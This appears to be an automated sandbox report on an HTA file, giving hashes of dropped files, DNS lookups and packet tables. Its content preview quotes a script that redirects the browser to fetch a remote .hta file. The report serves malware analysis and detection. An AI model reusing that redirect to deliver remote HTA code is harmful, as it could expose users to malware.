Malicious: | false |
Preview: |
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4286 |
Entropy (8bit): | 3.8046022951415335 |
Encrypted: | false |
SSDEEP: | 24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne |
MD5: | DA597791BE3B6E732F0BC8B20E38EE62 |
SHA1: | 1125C45D285C360542027D7554A5C442288974DE |
SHA-256: | 5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07 |
SHA-512: | D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.06881200911582831 |
Encrypted: | false |
SSDEEP: | 3:alFXEAUolllbll1nltllNlFlVlZmllol/Hflly7l8t5tXlRsltFll2/lsllM/llO:a/vllLaluqh8tMl3+tsM6GK2K8llNW1 |
MD5: | 8D1691840EA6879FA637F5B98BCB4DE3 |
SHA1: | 92CB7DC3D1686C31B954BABE9038F917F482B73D |
SHA-256: | 0067192007D15F247B08B8A7FDDB7BEB9AAC8B480C4D984C4A6B374FAAFB06F5 |
SHA-512: | 016077209FB481D283CCC623C0378367EA73F637450B97130215508392B50CC321266AB78D588E932DB0CDC4B72746204BCEF1690DD06655598A61650D1FE5CD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.10285087861106086 |
Encrypted: | false |
SSDEEP: | 6:WyJE2wMJg565JE2wMJg5vql3+ts90yJWJ7:WyJE8J15JE8JF0tiJWJ |
MD5: | B116B21338E7F343977E3223621821EA |
SHA1: | DB4B595594012051459CA46FE97C205C662BCF31 |
SHA-256: | E7F0383ED2C9D90CC730015B1C1AFCC8E1594E2A07AB5FB8DE1C69407FC5C9C5 |
SHA-512: | 97D9F276983A402CE64668209B74F60E6FEE8699E9045C19C64537DA5CD8EF48567A67A701DA4542F3C7A5CFCBB75721D1A9CBD24B271CAC8D1A8B0FBAAB6462 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.32545475215037056 |
Encrypted: | false |
SSDEEP: | 12:i9lQcatQ0tUl/tPmGooNl1H3kwU7wNjLtdwo9O0PlO/l0I+ll+Q+v+MelDy:i9lb8UlcW1L4wvdwoNOtw/Y+M6 |
MD5: | BBAC28DD2CCCD2CFF5D74F0700BA83E1 |
SHA1: | C40B893D9F9172C109E910C59D3D0FEEBB993BDB |
SHA-256: | 6439E97B05703E45C43AACE75494FDD0AFDA7FEDB3E308648E420EE419B77069 |
SHA-512: | 09D3B91B657969E7EB6C261ED91576E1F3C06805ACCBAA79B0452BEC8CC3CC8D1F9553CB05EBA069D23F3E3260AFA434423376F11185443091D5762158593744 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.824877375020712 |
TrID: |
|
File name: | hyirn.hta |
File size: | 480 bytes |
MD5: | 677744e61095af1985740d4867a7799f |
SHA1: | 81d1d4982501cd50a12599554a7efb570852d37b |
SHA256: | ec3b78ff8656414003e6fd72f6c84d05824c15b8b9c75737baaa25f35b064362 |
SHA512: | 6190069632db2fc83147a41193a1c97d66384f8138bc3ac9f08dc0da5071f39c2c5a60e7686a9cf85e1ffae307f4db7716262b3b31ede52b0ed1bbe4001e8cdb |
SSDEEP: | 12:kxvsCk9cE3MbUT/XU7J2vmbWkdJaLDfYI:kbxb8/kwviWkdJawI |
TLSH: | 76F023D70C56CC4DA1A1B50A8EAD9E4045DE05FC20A5D81E50E85C247C367EDCC052AA |
File Content Preview: | <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('https://d.coka.la/hyirn.hta?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTc0NTg0MDM3OSwiaWF0IjoxNzQ1ODMzMTc5LCJpc3MiOiJK |
Download Network PCAP: filtered – full
- Total Packets: 61
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 28, 2025 11:43:18.210249901 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:18.210313082 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:18.210422039 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:18.210452080 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:18.210494995 CEST | 443 | 49693 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:18.211780071 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:18.212750912 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:18.212773085 CEST | 443 | 49693 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:18.212905884 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:18.212934971 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:18.822026014 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:18.822161913 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:18.825680971 CEST | 443 | 49693 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:18.825759888 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.156852007 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.156896114 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.156936884 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.156964064 CEST | 443 | 49693 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.157123089 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.157133102 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.157306910 CEST | 443 | 49693 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.157355070 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.157649040 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.157701969 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.517693996 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.517756939 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.517786980 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.517828941 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.517976999 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.518027067 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.518047094 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.518091917 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.525753975 CEST | 49692 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:19.525777102 CEST | 443 | 49692 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:19.833889961 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:19.834404945 CEST | 49695 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:19.981652021 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:19.981745958 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:19.981966019 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:19.982065916 CEST | 80 | 49695 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:19.982187033 CEST | 49695 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.129770994 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.197915077 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.197936058 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.197995901 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.197995901 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.204744101 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.204840899 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.215713024 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.363322973 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431549072 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431637049 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431648970 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431662083 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431674004 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431684971 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431698084 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431710005 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431720018 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431723118 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431736946 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431747913 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431752920 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431759119 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431765079 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431776047 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431788921 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431790113 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431802034 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431802034 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431813002 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431817055 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431829929 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431839943 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431843042 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431847095 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431859016 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431869030 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431869984 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431883097 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431894064 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431900024 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431904078 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431922913 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431930065 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431935072 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431942940 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431946039 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431947947 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431953907 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.431957006 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.431982994 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.432137012 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:20.472767115 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:20.472870111 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:23.830091953 CEST | 443 | 49693 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:23.830135107 CEST | 443 | 49693 | 162.210.199.87 | 192.168.2.5 |
Apr 28, 2025 11:43:23.830143929 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:23.830194950 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:43:30.123357058 CEST | 80 | 49695 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:30.123393059 CEST | 80 | 49695 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:30.123420954 CEST | 49695 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:30.123461962 CEST | 49695 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:30.130800009 CEST | 80 | 49695 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:30.130840063 CEST | 49695 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:43:30.431581974 CEST | 80 | 49694 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:43:30.431651115 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:45:07.455346107 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:45:07.455451012 CEST | 49695 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:45:07.455451965 CEST | 49695 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:45:07.455713987 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:45:07.455728054 CEST | 49693 | 443 | 192.168.2.5 | 162.210.199.87 |
Apr 28, 2025 11:45:07.603230000 CEST | 80 | 49695 | 199.59.243.228 | 192.168.2.5 |
Apr 28, 2025 11:45:07.782330990 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:45:08.438622952 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:45:09.751091957 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:45:12.360455036 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Apr 28, 2025 11:45:17.579148054 CEST | 49694 | 80 | 192.168.2.5 | 199.59.243.228 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 28, 2025 11:43:10.463339090 CEST | 61054 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 28, 2025 11:43:10.603580952 CEST | 53 | 61054 | 1.1.1.1 | 192.168.2.5 |
Apr 28, 2025 11:43:17.960412025 CEST | 58657 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 28, 2025 11:43:18.202199936 CEST | 53 | 58657 | 1.1.1.1 | 192.168.2.5 |
Apr 28, 2025 11:43:19.530841112 CEST | 61047 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 28, 2025 11:43:19.829741955 CEST | 53 | 61047 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 28, 2025 11:43:10.463339090 CEST | 192.168.2.5 | 1.1.1.1 | 0xd2eb | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 28, 2025 11:43:17.960412025 CEST | 192.168.2.5 | 1.1.1.1 | 0x7939 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 28, 2025 11:43:19.530841112 CEST | 192.168.2.5 | 1.1.1.1 | 0xcf67 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 28, 2025 11:43:08.901993990 CEST | 1.1.1.1 | 192.168.2.5 | 0x7f49 | No error (0) | 199.232.210.172 | A (IP address) | IN (0x0001) | false | ||
Apr 28, 2025 11:43:08.901993990 CEST | 1.1.1.1 | 192.168.2.5 | 0x7f49 | No error (0) | 199.232.214.172 | A (IP address) | IN (0x0001) | false | ||
Apr 28, 2025 11:43:10.603580952 CEST | 1.1.1.1 | 192.168.2.5 | 0xd2eb | No error (0) | pki-goog.l.google.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Apr 28, 2025 11:43:10.603580952 CEST | 1.1.1.1 | 192.168.2.5 | 0xd2eb | No error (0) | 192.178.49.195 | A (IP address) | IN (0x0001) | false | ||
Apr 28, 2025 11:43:18.202199936 CEST | 1.1.1.1 | 192.168.2.5 | 0x7939 | No error (0) | 162.210.199.87 | A (IP address) | IN (0x0001) | false | ||
Apr 28, 2025 11:43:19.829741955 CEST | 1.1.1.1 | 192.168.2.5 | 0xcf67 | No error (0) | 12065.bodis.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Apr 28, 2025 11:43:19.829741955 CEST | 1.1.1.1 | 192.168.2.5 | 0xcf67 | No error (0) | 199.59.243.228 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49694 | 199.59.243.228 | 80 | 6148 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 28, 2025 11:43:19.981966019 CEST | 258 | OUT | |
Apr 28, 2025 11:43:20.197915077 CEST | 1358 | IN |